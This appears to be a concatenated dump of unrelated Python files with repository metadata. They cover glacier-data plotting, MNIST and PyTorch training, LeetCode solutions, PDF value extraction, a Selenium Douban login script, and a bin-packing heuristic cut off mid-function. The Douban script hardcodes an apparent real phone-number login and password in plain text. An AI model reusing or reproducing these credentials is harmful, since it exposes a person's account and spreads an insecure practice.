ax = fig.add_subplot(grid[:3,2:4])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,30))
ax.set_ylim((0,55))
ax.set_xticks([0,10,20])
# ax.text(0.075, 0.975, 'B', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(5,0,60,color=col[2],linewidth=0.5)
ax.text(6,c1s[3]-5,'$s_2$',color=col[2],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(20,0,60,color=col[3],linewidth=0.5)
ax.text(21,c1s[4]-5,'$s_3$',color=col[3],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted',label='Global mean variance')
ax.set_yticks([])
ax.set_xlabel('Spatial lag (km)')
ax.plot([],[],color='grey',linestyle='dashed',label='Sum of spherical models')
ax.scatter([],[],color='black',marker='x',label='Empirical variance')
ax.vlines([],[],[],color=col[0],label='0.15 km',linewidth=0.5)
ax.vlines([],[],[],color=col[1],label='2 km',linewidth=0.5)
ax.vlines([],[],[],color=col[2],label='5 km',linewidth=0.5)
ax.vlines([],[],[],color=col[3],label='20 km',linewidth=0.5)
ax.vlines([],[],[],color=col[4],label='50 km',linewidth=0.5)
ax.vlines([],[],[],color=col[5],label='200 km',linewidth=0.5)
ax.vlines([],[],[],color=col[6],label='500 km',linewidth=0.5)
ax.legend(loc='lower center',ncol=3,title='Spatial correlations of GP elevation at $\Delta t$ = 720 days',title_fontsize=6,columnspacing=0.5)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[3:,:6])
coefs_list = []
y = None
# arr_res[0:1,4]=25
# arr_res[arr_res>25] = 25.
# arr_res[4,2]=np.nan
# arr_res[3:,3]=np.nan
# arr_res[0,3]=25.
# arr_res[0,3:] = np.nan
for i in [0,1,2,3,4,5,6]:
# i=0
# arr_res[-1,0]=np.nan
coefs , _ = scipy.optimize.curve_fit(lambda t,a,b:a*t+b, np.array(dts)[~np.isnan(arr_res[:,i])], np.sqrt(arr_res[:,i][~np.isnan(arr_res[:,i])]))
coefs_list.append(coefs)
x = np.arange(0, 3000, 1)
if y is not None:
y0 = y
else:
y0 = x*0
y = coefs[0]*x+coefs[1] #- 2*np.sin(x/365.2224*np.pi)**2
# y[y>25]=25.
# y[y<y0]=y0[y<y0]
y = y
ax.plot(x,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color=col[i])
ax.fill_between(x,y0**2 -2*np.sin(x/365.2224*2*np.pi)**2,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color = col[i],alpha=0.2)
# ax.fill_between(x,40*np.ones(len(x)),y,color='tab:gray')
# arr_res[0,3:]=25.
for i in [0,1,2,3,4,5,6]:
ax.scatter(dts,arr_res[:,i],color=col[i])
# ax.hlines(25,0,3000,linestyles='dashed',color='tab:gray')
ax.plot([],[],color='black',label='Quadratic\nsin fit')
ax.fill_between([],[],color=col[0],label='0.15 km')
ax.fill_between([],[],color=col[1],label='2 km')
ax.fill_between([],[],color=col[2],label='5 km')
ax.fill_between([],[],color=col[3],label='20 km')
ax.scatter([],[],color='black',label='Empirical\nvariance')
ax.fill_between([],[],color=col[4],label='50 km')
ax.fill_between([],[],color=col[5],label='200 km')
ax.fill_between([],[],color=col[6],label='500 km')
ax.set_xlim([0,1500])
ax.set_ylim([0,60])
ax.set_ylabel('Variance of elevation differences (m$^{2}$)')
ax.set_xlabel('Days to closest observation $\Delta t$')
ax.vlines(720,0,100,colors='black',linestyles='dashed')
ax.text(800,5,'$\overline{s_{0}(\Delta t)}$: correlated until 0.15 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:orange')
ax.text(900,24,'$s_{1}(\Delta t)$: correlated until 2 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:blue')
ax.text(1250,38,'$s_{3}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:red')
ax.text(1350,48,'$s_{5}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:brown')
# ax.text(1000,22,'Fully correlated = Systematic',bbox= dict(boxstyle='round', facecolor='white', alpha=0.5),color='dimgrey')
# plt.xscale('log')
ax.legend(loc='upper left',bbox_to_anchor=(0, 0, 1, 0.925),title='Spatial correlations of\nGP elevation with\ntime lag to observation',title_fontsize=6,ncol=2,columnspacing=0.5)
ax.text(0.025, 0.975, 'b', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.text(740,45,'panel (a)',fontweight='bold',va='bottom',ha='left')
# plt.savefig('/home/atom/ongoing/work_worldwide/figures/Figure_S12.png',dpi=360)
ax.tick_params(width=0.35,length=2.5)
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from pybob.ddem_tools import nmad
df_gp = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')
df_hr = pd.read_csv('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.category.values=='matthias')
# ind = np.logical_and(df_hr.perc_meas>0.70,df_hr.area.values<1000000.)
ind = df_hr.perc_meas>0.70
list_rgiid = list(df_hr[ind].rgiid)
list_area = list(df_hr[df_hr.rgiid.isin(list_rgiid)].area)
list_rgiid = [rgiid for _, rgiid in sorted(zip(list_area,list_rgiid),reverse=True)]
list_area = sorted(list_area,reverse=True)
ax = fig.add_subplot(grid[:2, 7:])
kval = 3.5
# sites=np.unique(data['Site'])
# colors=['b','g','r','c','m','y','k','grey']
colors = ['tab:blue','tab:orange','tab:red','tab:grey']
# sites=sites.tolist()
ax.plot([-3, 0.5], [-3, 0.5], color='k', linestyle='-', linewidth=0.75)
label_list=[]
diff2 = []
list_area2 = []
for rgiid in list_rgiid:
df_gp_rgiid = df_gp[df_gp.rgiid==rgiid]
df_hr_rgiid = df_hr[df_hr.rgiid==rgiid]
if df_hr_rgiid.category.values[0]=='matthias':
col = colors[0]
elif df_hr_rgiid.category.values[0]=='brian':
col = colors[1]
else:
if df_hr_rgiid.site.values[0] in ['Chhota','Gangotri','Abramov','Mera']:
col = colors[2]
elif df_hr_rgiid.site.values[0] == 'Yukon':
col=colors[3]
elif df_hr_rgiid.site.values[0] == 'MontBlanc':
col=colors[0]
ax.errorbar(df_hr_rgiid.dhdt.values[0], df_gp_rgiid.dhdt.values[0],
xerr=df_hr_rgiid.err_dhdt.values[0],
yerr=df_gp_rgiid.err_dhdt.values[0],marker='o',mec='k',
ms=kval*(df_hr_rgiid.area.values[0]/1000000)**0.5/3, mew=0.25,elinewidth=0.25,ecolor=col,mfc=col,alpha=0.9)
#,ecolor=colors[sites.index(data['Site'][value])]mfc=colors[sites.index(data['Site'][value])],alpha=0.5)
diff2.append(df_hr_rgiid.dhdt.values[0]-df_gp_rgiid.dhdt.values[0])
list_area2.append(df_hr_rgiid.area.values[0])
ax.text(-1.5,0,'Mean bias:\n'+str(np.round(np.nanmean(diff2),2))+'$\pm$'+str(np.round(2*nmad(diff2)/np.sqrt(len(diff2)),2))+' m yr$^{-1}$',ha='center',va='center',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
print(np.nanmean(diff2))
print(np.nansum(np.array(diff2)*np.array(list_area2))/np.nansum(np.array(list_area2)))
ax.set_ylabel('Specific volume change (m yr$^{-1}$)')
ax.set_xlabel('High-resolution specific volume change (m yr$^{-1}$)')
#plt.legend(loc='upper left')
ax.set_xlim([-2.65, 0.5])
ax.set_ylim([-2.65, 0.5])
#mask = ~np.isnan(b_dot_anomaly) & ~np.isnan(dP)
# slope, intercept, r_value, p_value, std_err = stats.linregress(data['MB GEOD'], data['MB ASTER'])
# print(slope)
# print("r-squared:", r_value**2)
# print('std err:', std_err)
# plt.text(-320, -1250, 'Slope:' + str(np.round(slope, 2)))
# plt.text(-320, -1300, 'r$^{2}$:' + str(np.round(r_value**2, 2)))
## add symbols to show relative size of glaciers
ax.errorbar(-2150/1000,-150/1000,ms = kval*(5.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k',marker='o')
ax.errorbar(-2150/1000,-500/1000,ms = kval*(50.0**0.5)/3, xerr=0.0001, yerr=0.0001,color='k',marker='o')
ax.errorbar(-2150/1000,-1250/1000,ms = kval*(500.0**0.5)/3, xerr=0.0001, yerr=0.0001, color='k', marker='o')
ax.text(-2150/1000, -220/1000,'5 km$^2$',va='top',ha='center')
ax.text(-2150/1000, -650/1000,'50 km$^2$',va='top',ha='center')
ax.text(-2150/1000, -1730/1000,'500 km$^2$',va='top',ha='center')
ax.text(0.025,0.966,'c',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.plot([],[],color=colors[0],label='Alps',lw=1)
ax.plot([],[],color=colors[1],label='Western North America',lw=1)
ax.plot([],[],color=colors[2],label='High Mountain Asia',lw=1)
ax.plot([],[],color=colors[3],label='Alaska',lw=1)
ax.plot([],[],color='k',label='1:1 line',lw=0.5)
ax.legend(loc='lower right',title='Validation of volume changes\nwith high-resolution DEMs',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[4:, 7:])
ax.text(0.025,0.966,'e',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_err_dhdt=[0.1,0.2,0.4,0.6,0.8,1,1.5,2]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_err_dhdt)-1):
ind = np.logical_and(df_gp.err_dhdt < vec_err_dhdt[i+1],df_gp.err_dhdt>=vec_err_dhdt[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
err_dhdt.append(err)
diff_dhdt.append(diff)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_err_dhdt[i+1],vec_err_dhdt[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i < 2:
va_text = 'bottom'
y_off = 0.1
if i == 0:
x_off = -0.05
else:
x_off = 0
else:
va_text = 'top'
y_off = -0.1
ax.text(bin_err[i]+x_off, list_err_emp[i] + y_off, str(nb_gla[i]) + ' gla.\n' + str(np.round(nb_95ci[i] * 100, 0)) + '%',
va=va_text, ha='center')
ax.plot([0,2],[0,2],color='k',label='1:1 line',lw=0.5)
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Error (1$\sigma$) comparison to HR elevation differences\n(printed: glacier number and $\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xlabel('Theoretical specific volume change error (m yr$^{-1}$)')
ax.set_ylabel('Empirical specific volume\nchange error (m yr$^{-1}$)')
ax.set_ylim((0,1.4))
ax.legend(loc='upper right',title='Validation of volume change errors\nwith varying error size',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[2:4, 7:])
ax.text(0.025,0.966,'d',transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
vec_area=[0.01,0.05,0.2,1,5,20,200,1500]
list_err_emp = []
list_err_the = []
bin_err = []
nb_95ci = []
nb_gla = []
for i in range(len(vec_area)-1):
ind = np.logical_and(df_gp.area.values/1000000 < vec_area[i+1],df_gp.area.values/1000000>=vec_area[i])
list_rgiid = list(df_gp[ind].rgiid)
diff_dhdt = []
err_dhdt = []
ci_size = []
for rgiid in list_rgiid:
diff = df_hr[df_hr.rgiid==rgiid].dhdt.values[0] - df_gp[df_gp.rgiid==rgiid].dhdt.values[0]
err = np.sqrt(df_hr[df_hr.rgiid==rgiid].err_dhdt.values[0]**2+df_gp[df_gp.rgiid==rgiid].err_dhdt.values[0]**2)
diff_dhdt.append(diff)
err_dhdt.append(err)
if np.abs(diff) - 2 * np.abs(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]) - 2 * np.abs(
df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]) > 0:
ci_too_small = 0
elif ~np.isnan(diff):
ci_too_small = 1
else:
ci_too_small = np.nan
ci_size.append(ci_too_small)
list_err_emp.append(nmad(diff_dhdt))
list_err_the.append(np.nanmedian(err_dhdt))
bin_err.append(np.mean((vec_area[i+1],vec_area[i])))
nb_95ci.append(np.nansum(ci_size)/np.count_nonzero(~np.isnan(ci_size)))
nb_gla.append(np.count_nonzero(~np.isnan(ci_size)))
if i <2:
va_text = 'top'
y_off = -0.1
else:
va_text = 'bottom'
y_off = 0.1
ax.text(bin_err[i],list_err_emp[i]+y_off,str(nb_gla[i])+' gla.\n'+str(np.round(nb_95ci[i]*100,0))+'%',va=va_text,ha='center')
ax.plot(bin_err,list_err_the,color='black',label='Theoretical error (1$\sigma$):\nspatially integrated variograms',marker='x')
ax.plot(bin_err,list_err_emp,color='tab:blue',label='Empirical error (1$\sigma$):\ncomparison to HR elevation differences\n(printed: glacier number and\n$\%$ of intersecting 95% CIs)',linestyle='dashed',marker='x')
ax.set_xscale('log')
ax.set_xlabel('Area (km$^{2}$)')
ax.set_ylabel('Specific volume\nchange error (m yr$^{-1}$)')
ax.set_ylim([0,1.4])
ax.legend(loc='upper right',title='Validation of volume change errors\nwith varying glaciers area',title_fontsize=6)
ax.tick_params(width=0.35,length=2.5)
plt.savefig('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',dpi=500)
| [
"[email protected]"
] | |
b6ad7644f23266306c4ba451f1ea9f54c617960f | b480e96001e478c26f8d986d3a8889d46e7c2ff2 | /test_twitter_data.py | 985e9f42afa9765a6338c7c158d33bc786e6b73b | [] | no_license | pranshulgupta7/opinion-mining | c084b7fec726e04a83b0fdae953b8df3976a0549 | 25585d78b8918f7da1be803835d9a8b66c2c2ecb | refs/heads/master | 2020-06-17T21:16:54.569052 | 2019-07-09T18:22:16 | 2019-07-09T18:22:16 | 196,057,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | #!/usr/bin/env python
import get_twitter_data
## PLACE CREDENTIALS in config.json file or run this file with appropriate arguments from command line
keyword = 'iphone'
time = 'today'
twitterData = get_twitter_data.TwitterData()
tweets = twitterData.getTwitterData(keyword, time)
print tweets
| [
"[email protected]"
] | |
b0def42355d753d0f2d67ed743d9fe7df66c8387 | e9fbeceb79f45d1fc67d41d2fcb38779275dac80 | /NN.py | 6bb3aa830382a34a654c0c355d8af280fcc7b9b4 | [] | no_license | Aqw12345/test | 51dd1c202937e5446b92c06c68c6bf30021bbe19 | 191cdb9cd461566acd79107870fada174bf0bfb4 | refs/heads/master | 2020-03-25T09:57:18.737622 | 2018-08-06T05:54:59 | 2018-08-06T05:54:59 | 143,680,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,337 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 15:13:44 2018
@author: dk
"""
# Simple neural network (no activation functions)
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
#from mnist import read_data_sets
import numpy as np
import pylab
import matplotlib.pyplot as plt
mnist=input_data.read_data_sets(u"g:/mnist/MNIST_data/",one_hot=True)
#parameters
learning_rate=0.1
num_steps=500
batch_size=128
display_step=100
# Network parameters: number of neurons in the 1st and 2nd hidden layers
n_hidden_1=256
n_hidden_2=256
num_input=784 #mnist 28*28 feature
num_classes=10 #output labels(0-9)
x=tf.placeholder(tf.float32,[None,num_input])
y=tf.placeholder(tf.float32,[None,num_classes])
#weight and bias
weight={'h1':tf.Variable(tf.random_normal([num_input,n_hidden_1])),\
'h2':tf.Variable(tf.random_normal([n_hidden_1,n_hidden_2])),\
'out':tf.Variable(tf.random_normal([n_hidden_2,num_classes]))}
biases={'b1':tf.Variable(tf.random_normal([n_hidden_1])),\
'b2':tf.Variable(tf.random_normal([n_hidden_2])),\
'out':tf.Variable(tf.random_normal([num_classes]))}
#create model
def neuron_net(x):
#Hidden1 fully connected layer with 256 neurons
layer_1=tf.add(tf.matmul(x,weight['h1']),biases['b1'])
#Hidden2 fully connected layer with 256 neurons
layer_2=tf.add(tf.matmul(layer_1,weight['h2']),biases['b2'])
# Output fully connected layer with a neuron for each class
out_layer=tf.add(tf.matmul(layer_2,weight['out']),biases['out'])
return out_layer
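# Note: because no nonlinear activation is applied between layers, the three stacked
# linear layers collapse into a single affine map of the input, so this "deep" model
# has no more expressive power than plain softmax regression on the pixels.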
#Construct model
logits=neuron_net(x)
prediction=tf.nn.softmax(logits)
#loss function and optimizer
loss_op=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=y))
optimizer=tf.train.AdamOptimizer(learning_rate).minimize(loss_op)
#Evaluate model
correct_pred=tf.equal(tf.argmax(prediction,1),tf.argmax(y,1))
accuracy=tf.reduce_mean(tf.cast(correct_pred,tf.float32))
init=tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(1,num_steps+1):
batch_x,batch_y=mnist.train.next_batch(batch_size)
sess.run(optimizer,feed_dict={x:batch_x,y:batch_y})
if (step%display_step==0)or(step==1):
loss,acc=sess.run([loss_op,accuracy],feed_dict={x:batch_x,y:batch_y})
print("Step:"+ str(step)+",loss="+"{:.4f}".format(loss)+",training accuracy="+"{:.3f}".format(acc))
print("Optimization Finished!")
print("Testing Accuracy:",sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels}))
# Visualization: show the first misclassified test image
for i in range(0, len(mnist.test.images)):
result = sess.run(correct_pred, feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])})
if not result:
            print('Predicted value:',sess.run(prediction, feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])}))
            print('Actual value:',sess.run(y,feed_dict={x: np.array([mnist.test.images[i]]), y: np.array([mnist.test.labels[i]])}))
one_pic_arr = np.reshape(mnist.test.images[i], (28, 28))
pic_matrix = np.matrix(one_pic_arr, dtype="float")
plt.imshow(pic_matrix)
pylab.show()
break
print(sess.run(accuracy, feed_dict={x: mnist.test.images,y: mnist.test.labels})) | [
"[email protected]"
] | |
3451487c8e6500248f939fb75c0b0f04cfaed4d1 | 2b5287769a1b6fa3db8ef87da696b1d437209731 | /RottenOranges.py | 246cba2cd7403a2b63292dd7c7faac9a4cf89b7c | [] | no_license | 08vishal/BFS-2 | 8176bd7b72f4a04b53d15d52ac85a7a91f8a8b32 | c61063ec7e2d720c7431355bf23e8a4eb31de061 | refs/heads/master | 2020-09-05T12:15:03.211279 | 2019-11-08T02:23:25 | 2019-11-08T02:23:25 | 220,101,391 | 0 | 0 | null | 2019-11-06T22:21:41 | 2019-11-06T22:21:40 | null | UTF-8 | Python | false | false | 1,186 | py | #Time Complexity:O(n2)
#Space Complexity: O(m*n) for the BFS queue in the worst case
#LeetCode Submission:successful
#We use BFS: seed the queue with every rotten orange, then expand level by level until the queue is empty
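#Hypothetical quick check (not part of the original submission); the grid and the
#expected answer of 4 minutes come from the classic LeetCode 994 example:
#   print(Solution().orangesRotting([[2, 1, 1], [1, 1, 0], [0, 1, 1]]))  # -> 4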
class Solution(object):
def orangesRotting(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
fresh=0
m=len(grid)
n=len(grid[0])
q=[]
for i in range(m):
for j in range(n):
if grid[i][j]==2:
q.append([i,j])
if grid[i][j]==1:
fresh=fresh+1
if fresh==0:
return 0
dirs=[[0,1],[0,-1],[1,0],[-1,0]]
count=0
while(len(q) > 0):
size=len(q)
for i in range(size):
rotten=q.pop(0)
for d in dirs:
a=rotten[0]+d[0]
b=rotten[1]+d[1]
if a>=0 and a<m and b>=0 and b<n and grid[a][b]==1:
q.append([a,b])
grid[a][b]=2
fresh=fresh-1
count=count+1
if fresh !=0:
return -1
return count-1 | [
"[email protected]"
] | |
c000dff53ade0ae89692006e604a19094da2e011 | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/2529. Maximum Count of Positive Integer and Negative Integer/2529.py | c3a5e86c5fafa57b99f04a0501dc11152a560285 | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 404 | py | # https://helloacm.com/teaching-kids-programming-maximum-count-of-positive-integer-and-negative-integer-in-sorted-array/
# https://leetcode.com/problems/maximum-count-of-positive-integer-and-negative-integer/
# EASY, BINARY SEARCH
from bisect import bisect_left, bisect_right
from typing import List
class Solution:
def maximumCount(self, nums: List[int]) -> int:
n = bisect_left(nums, 0)
p = len(nums) - bisect_right(nums, 0)
return max(p, n)
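# Hypothetical usage (example values taken from the problem statement):
# Solution().maximumCount([-2, -1, -1, 1, 2, 3]) returns 3 -- three negatives,
# three positives, and zeros (none here) would count as neither.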
| [
"[email protected]"
] | |
9ed561bf9d023279c996061a5782fcd75045b385 | c230be483822fe044e01c924b13aaab1b635d1a1 | /Grupo 02/value_finder.py | 1951d208b13cc403d0553a58d6e435246e207a76 | [] | no_license | justicafederalRN/hackathonjfrn | 06967e6a935d93c92a82f66614c5ca56b4c5c1a3 | e69a6892f63e42bf2985fc90df26511a65006660 | refs/heads/master | 2020-03-10T14:27:04.767284 | 2018-04-18T18:04:22 | 2018-04-18T18:04:22 | 129,426,629 | 0 | 13 | null | 2018-04-18T18:04:23 | 2018-04-13T16:17:49 | JavaScript | UTF-8 | Python | false | false | 982 | py | # coding: utf-8
# (C) Júlio Barreto
# Extract monetary values from court ruling (sentenca) PDFs
from tika import parser
import ujson, re, os
def values(filename):
pdf_ = parser.from_file(filename)
pdf = pdf_['content'].split('\n')
pdf = pdf[32:-4]
dic = {}
dic['processo'] = re.findall("PROCESSO Nº: (.*?) - ", pdf[0])[0]
with open("texts/" + dic['processo'] + '.txt','w') as res:
res.write(pdf_['content'])
dic['valores'] = []
for i in pdf:
try:
index = i.index("R$")
except ValueError:
index = -1
if index != -1:
s = ""
mark = 0
boolean = False
while mark < 2 and len(i) > index:
if boolean:
mark += 1
if i[index] == ",":
boolean = True
if i[index] != " ":
s += i[index]
index += 1
dic['valores'].append(s)
return dic
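# The character-walking loop above starts at "R$" and keeps non-space characters
# until two digits after the comma (Brazilian currency format, e.g. "R$ 1.234,56").
# A regex sketch that should capture the same values (an assumption, not validated
# against these PDFs) would be:
#   re.findall(r"R\$\s*[\d\.]+,\d{2}", i)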
for filename in os.listdir(os.getcwd()):
if (filename.endswith('.pdf')):
print(filename)
dic = values(filename)
with open("jsons/" + dic['processo'] + '.json','w') as res:
ujson.dump(dic, res)
| [
"[email protected]"
] | |
e0bfba5a9182ac893ec61ec8f57536236925294b | ad2090cc9591d38456621951d4901276481b55fd | /爬虫/爬虫代码/13.login_douban.py | 93cba307c7d4d4eb5184e40d309878777358bdec | [] | no_license | GuangGuangLi-Artist/LearningPython | 9d17366c4b64f5b3d53b885b71f1cf9bd4d2f53f | 0810ff6d0cc557f4d5ed8c024ce413a93183a6da | refs/heads/master | 2023-08-18T16:32:03.595418 | 2023-07-30T09:47:48 | 2023-07-30T09:47:48 | 201,511,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,866 | py | #coding=utf-8
from selenium import webdriver
import time
class DouBan():
def __init__(self):
self.driver = webdriver.Chrome()
def get_cook(self):
        '''Return the current session cookies as a dict'''
cookies = {i["name"]:i["value"] for i in self.driver.get_cookies()}
return cookies
def run(self):
self.driver.get("https://www.douban.com/")
time.sleep(3)
self.driver.switch_to.frame(self.driver.find_element_by_tag_name('iframe'))
self.driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
time.sleep(3)
self.driver.find_element_by_id("username").send_keys("15193252279")
self.driver.find_element_by_id("password").send_keys("930819@lg")
self.driver.find_element_by_class_name("account-form-field-submit").click()
time.sleep(10)
        # Fetch and print the cookies
print(self.get_cook())
time.sleep(5)
self.driver.close()
#
# def main():
#
# options = webdriver.ChromeOptions()
# options.add_argument(
# 'user-agent=" Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36"')
# driver = webdriver.Chrome(chrome_options=options)
# driver.get("https://www.douban.com/")
#
#     # switch to the login iframe
# driver.switch_to.frame(driver.find_element_by_tag_name('iframe'))
#     # click the username/password login tab first
# driver.find_element_by_xpath('/html/body/div[1]/div[1]/ul[1]/li[2]').click()
# time.sleep(3)
# driver.find_element_by_id("username").send_keys("15193252279")
# driver.find_element_by_id("password").send_keys("930819@lg")
#
# time.sleep(3)
#
# driver.find_element_by_class_name('account-form-field-submit ').click()
#
# time.sleep(12)
# driver.close()
if __name__ == '__main__':
db = DouBan()
db.run() | [
"[email protected]"
] | |
c7150ae1c5619678c686491e1e17d58ea079b228 | fb9be02fe82e35ab44c4caa3c7a468cb34aecc39 | /python/pytorch/train.py | 54dcefaf605f33d3fbd3740e70d092523971c044 | [] | no_license | hitaitengteng/mlflow-examples | 4e70053c7adf154139dfa3f7d7cae214bb841709 | e7f840a012c019c65a688e4ba69fbb949371f3e1 | refs/heads/master | 2022-11-26T15:42:40.837083 | 2020-07-24T07:07:29 | 2020-07-24T07:07:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,273 | py |
# Partial Model example modified from Sung Kim
# https://github.com/hunkim/PyTorchZeroToAll
import torch
import mlflow
import mlflow.pytorch
print("Torch Version:", torch.__version__)
print("MLflow Version:", mlflow.__version__)
print("Tracking URI:", mlflow.tracking.get_tracking_uri())
x_data = torch.Tensor([[1.0], [2.0], [3.0]])
y_data = torch.Tensor([[2.0], [4.0], [6.0]])
test_data = [4.0, 5.0, 6.0]
class Model(torch.nn.Module):
def __init__(self):
super(Model, self).__init__()
self.linear = torch.nn.Linear(1, 1)
def forward(self, x):
y_pred = self.linear(x)
return y_pred
def run(epochs, log_as_onnx):
model = Model()
print("model.type:",type(model))
    criterion = torch.nn.MSELoss(reduction='sum')
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
print("Train:")
for epoch in range(epochs):
y_pred = model(x_data)
loss = criterion(y_pred, y_data)
print(f" Epoch: {epoch} Loss: {loss.data.item()}")
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("Predictions:")
for v in test_data:
tv = torch.Tensor([[v]])
y_pred = model(tv)
print(f" {v}: {model(tv).data[0][0]}")
with mlflow.start_run() as run:
print("run_id:",run.info.run_id)
mlflow.log_param("epochs", epochs)
mlflow.pytorch.log_model(model, "pytorch-model")
if args.log_as_onnx:
import onnx_utils
import onnx
print("ONNX Version:", onnx.__version__)
onnx_utils.log_model(model, "onnx-model", x_data)
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--experiment_name", dest="experiment_name", help="experiment_name", default="mnist_keras")
parser.add_argument("--epochs", dest="epochs", help="epochs", default=2, type=int)
parser.add_argument("--log_as_onnx", dest="log_as_onnx", help="Log model as ONNX", default=False, action='store_true')
args = parser.parse_args()
print("Arguments:")
for arg in vars(args):
print(f" {arg}: {getattr(args, arg)}")
mlflow.set_experiment(args.experiment_name)
run(args.epochs, args.log_as_onnx)
| [
"[email protected]"
] | |
941d619540539bea7757589b89a87b799856e25f | bab119aa43329369f3fed17bd7fd6eb15f58c075 | /Final Project/Codes/heuristic.py | 2d7cfb327b63818a177cd812b66df3163b2f4f0b | [
"MIT"
] | permissive | AliRafieePour/MSCI-703-Applied-Optimization | 74766cede30ce2f4a2ba9ffe3024cacba20379fb | d5594e936debc518806e6bbbb07a5421cbb5a41a | refs/heads/main | 2023-05-14T16:40:28.009016 | 2021-06-01T22:11:50 | 2021-06-01T22:11:50 | 372,961,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,892 | py | from pyomo.environ import *
import random
import numpy as np
import logging
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from yellowbrick.cluster import KElbowVisualizer
logging.getLogger('pyomo.core').setLevel(logging.ERROR)
NUM_ITEMS = 10
i = [ii for ii in range(NUM_ITEMS)]
j = [jj for jj in range(NUM_ITEMS)]
s = ['x', 'y', 'z']
np.random.seed(50546)
def generateItems():
items = {i: {'x':np.random.randint(20, 60), 'y':np.random.randint(20, 60), 'z':np.random.randint(20, 60)} for i in range(NUM_ITEMS)}
items2 = []
for k in range(NUM_ITEMS):
items2.append([items[k]['x'], items[k]['y'], items[k]['z']])
return items, items2
lis, lis2 = generateItems()
Ls = {'x':59, 'y':59, 'z':200}
Ls2 = {0:59, 1:59, 2:200}
cis = [[0,0,0] for bb in range(NUM_ITEMS)]
def neighbour(cis, lis):
flag = 0
while(1):
